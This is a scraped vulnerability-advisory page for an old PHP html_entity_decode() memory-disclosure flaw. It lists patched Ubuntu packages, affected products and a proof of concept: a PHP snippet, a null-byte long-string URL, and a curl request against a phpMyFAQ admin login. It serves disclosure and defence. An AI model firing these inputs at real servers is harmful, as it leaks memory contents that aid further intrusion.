    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    19794 7d3e9991018ec3c7b28b4236ba42ba6a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:     8366 20b5da5c59948e9463330203bcc52f51
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    21996 76a2f1b592388e212d9aa558773cd691
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    37370 665de02ca6688d7dd03146129c5d6e76
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    27040 562863ebc8be1abcd735dae15709b5a4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    39792 53415a11f8951244b21e75adbde8cdc0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:     8058 f4a6f2df08fa4f9657c160bb837fc8cf
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    14168 985dc01b4e0950f934037a4639fcc7f4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    25628 c825ff65ace9081b91576008920ec6c9
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    20540 b13924d0aa87a8383df3f84b948aa218
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    37816 480b6ce2cef7ee6dd98f029e04c62d98
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    15134 55b262b92bb36b627feac23934aca18c

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:  2396144 98d336c16a7ffdd772ba2994cc8ba9e5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:  4688852 02f69483799090043d629d5a78853001
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:  2353148 e8a5f6a2963c0d9d723684db12c4065d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:   132238 6c474d0c1ceb008f97f85b73fe685d06
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    26616 c76a09aae09a8d0c1195dffa84f0ef80
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:   312580 4c46d8cfdaf7e847ec08eb3011e5b82d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    36444 b29354b8387fa985edfcfd3bcd982880
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    22552 74405a985740b8b5e68d96a01c90dbd1
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    10130 7afc71f7637ceed408c11a33c3c9e2d1
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    24826 1fc02301ddcb57909c64e1ad7a0a190a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    41780 f069234c7a4e854a09dd3c7b67252102
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    30092 48d14802bd5ef71ab8520af43f715214
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    43422 55f51396fc3c0dbcbdab69bc0ff2ea3d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:     9796 ad782f777da9399b3927dadd8319c959
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    15948 e4036cfad191d63b79396cf428c1e0f8
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    29438 77015416fc800ead0f816d713daa9714
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    23590 a02c781267ee06af613d1706223afef5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    40910 ffc934955f7391c3ccfb10c202c5851a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.1_powerpc.deb
      Size/MD5:    17252 f170632b7c712aeb2a6764f9df25d264

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:  2321540 1a985c6410df8ac88e66358d75065d7e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:  4529942 ba819957408a9c584a7a006b15b4a30b
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:  2274782 bb45955ca66a4f9b8355297e77c0f092
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:   132240 9867c156a4cc9edb521740795fe0ddf3
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    24556 12e7e7c0f1d20a7cd90851bfc265ef79
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:   312580 3d2382fc7b5868d9e132e45985ad6333
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    33244 db1e7ba5423cd5baa3cb7fdf37e0a62e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    20096 15a1c6fb8c76c258e9f5f03b19991628
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:     8372 c3115469f0537c3149c5c3b5925139ae
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    22366 df8c324f4ebf1e72a636e450fab6223e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    38660 9f3224345c16299e3fade95af39d28f1
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    26832 5a9106fc1fe568452732fcf791a6c118
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    40606 07ed68f2791ee9594a81d06e6d37e623
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:     8106 b905601f9bf6736d8f65603233770144
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    14062 7dfdcf22b1f527847cc0bb5cf8492bbe
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    25966 7a8200a4a4c254e533d9b377f4c6367d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    20796 8719c1a73d810392dec3a243e49d3d5f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    38034 e54cb9bced89ebbe1f541dd9faa67be3
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.1_sparc.deb
      Size/MD5:    15084 c19d460afff6d12e6077432042e19b76

    

- 漏洞信息

24248
PHP html_entity_decode() Function Memory Content Disclosure
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-03-28 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PHP Html_Entity_Decode() Information Disclosure Vulnerability
Input Validation Error 17296
Yes No
2006-03-29 12:00:00 2007-01-25 04:19:00
Reported by Tõnu Samuel.

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SGI ProPack 3.0 SP6
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
S.u.S.E. Linux Enterprise Server 9
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Desktop 4.0
RedHat Desktop 3.0
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
phpMyFAQ phpMyFAQ 1.5.4
phpMyFAQ phpMyFAQ 1.5.3
phpMyFAQ phpMyFAQ 1.5.1
phpMyFAQ phpMyFAQ 1.5 RC5
phpMyFAQ phpMyFAQ 1.5 RC4
phpMyFAQ phpMyFAQ 1.5 RC3
phpMyFAQ phpMyFAQ 1.5 RC2
phpMyFAQ phpMyFAQ 1.5 RC1
phpMyFAQ phpMyFAQ 1.5 beta3
phpMyFAQ phpMyFAQ 1.5 beta2
phpMyFAQ phpMyFAQ 1.5 beta1
phpMyFAQ phpMyFAQ 1.5 alpha2
phpMyFAQ phpMyFAQ 1.5 alpha1
phpMyFAQ phpMyFAQ 1.5
phpMyFAQ phpMyFAQ 1.4.9
phpMyFAQ phpMyFAQ 1.4.8
phpMyFAQ phpMyFAQ 1.4.7
phpMyFAQ phpMyFAQ 1.4.6
phpMyFAQ phpMyFAQ 1.4.5
phpMyFAQ phpMyFAQ 1.4.4
phpMyFAQ phpMyFAQ 1.4.3
phpMyFAQ phpMyFAQ 1.4.2
phpMyFAQ phpMyFAQ 1.4.1
phpMyFAQ phpMyFAQ 1.4 a
phpMyFAQ phpMyFAQ 1.4 -alpha 2
phpMyFAQ phpMyFAQ 1.4 -alpha 1
phpMyFAQ phpMyFAQ 1.4
phpMyFAQ phpMyFAQ 1.3.13
phpMyFAQ phpMyFAQ 1.3.12
PHP PHP 5.1.2
+ Ubuntu Ubuntu Linux 6.06 LTS sparc
+ Ubuntu Ubuntu Linux 6.06 LTS powerpc
+ Ubuntu Ubuntu Linux 6.06 LTS i386
+ Ubuntu Ubuntu Linux 6.06 LTS amd64
PHP PHP 5.1.1
PHP PHP 5.1
PHP PHP 5.0.5
PHP PHP 5.0.4
PHP PHP 5.0.3
PHP PHP 5.0.2
PHP PHP 5.0.1
PHP PHP 5.0 candidate 3
PHP PHP 5.0 candidate 2
PHP PHP 5.0 candidate 1
PHP PHP 5.0 .0
PHP PHP 4.4.2
PHP PHP 4.4.1
PHP PHP 4.4 .0
PHP PHP 4.3.11
PHP PHP 4.3.10
+ Gentoo Linux
+ Red Hat Fedora Core3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
+ Trustix Secure Linux 1.5
PHP PHP 4.3.9
PHP PHP 4.3.8
PHP PHP 4.3.7
PHP PHP 4.3.6
PHP PHP 4.3.5
PHP PHP 4.3.4
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ S.u.S.E. Linux Personal 9.1
PHP PHP 4.3.3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
PHP PHP 4.3.2
PHP PHP 4.3.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenPKG OpenPKG Current
+ S.u.S.E. Linux Personal 8.2
PHP PHP 4.3
Gentoo Linux
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
Avaya Messaging Storage Server MM3.0
Avaya Messaging Storage Server
Avaya Message Networking
Avaya Intuity LX
Avaya Interactive Response
Avaya Integrated Management
Avaya CVLAN
Avaya Converged Communications Server 2.0
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.3.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.3.9
PHP PHP 5.1.3 -RC1

- 不受影响的程序版本

PHP PHP 5.1.3 -RC1

- 漏洞讨论

PHP 'html_entity_decode()' function is prone to an information-disclosure vulnerability. This issue arises when a script using the function accepts data from a remote untrusted source and returns the function's result to an attacker.

Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.

PHP versions prior to 5.1.3-RC1 are vulnerable to this issue.

- 漏洞利用

An exploit is not required.

The following proofs of concept are available:

<?php

$foobar=html_entity_decode($_GET['foo']);
echo $foobar;

?>

Running it with url:

http://www.example.com/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss!
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss


curl "http://www.example.com/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

- 解决方案

Reports indicate that this issue has been addressed in PHP 5.1.3-RC1, but Symantec could not confirm this. Please contact the vendor for more information.

Please see the referenced vendor advisories for details.


S.u.S.E. Linux Professional 10.0

Trustix Secure Linux 2.2

PHP PHP 4.3.10

PHP PHP 4.3.3

PHP PHP 4.3.4

PHP PHP 4.3.9

PHP PHP 5.0.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站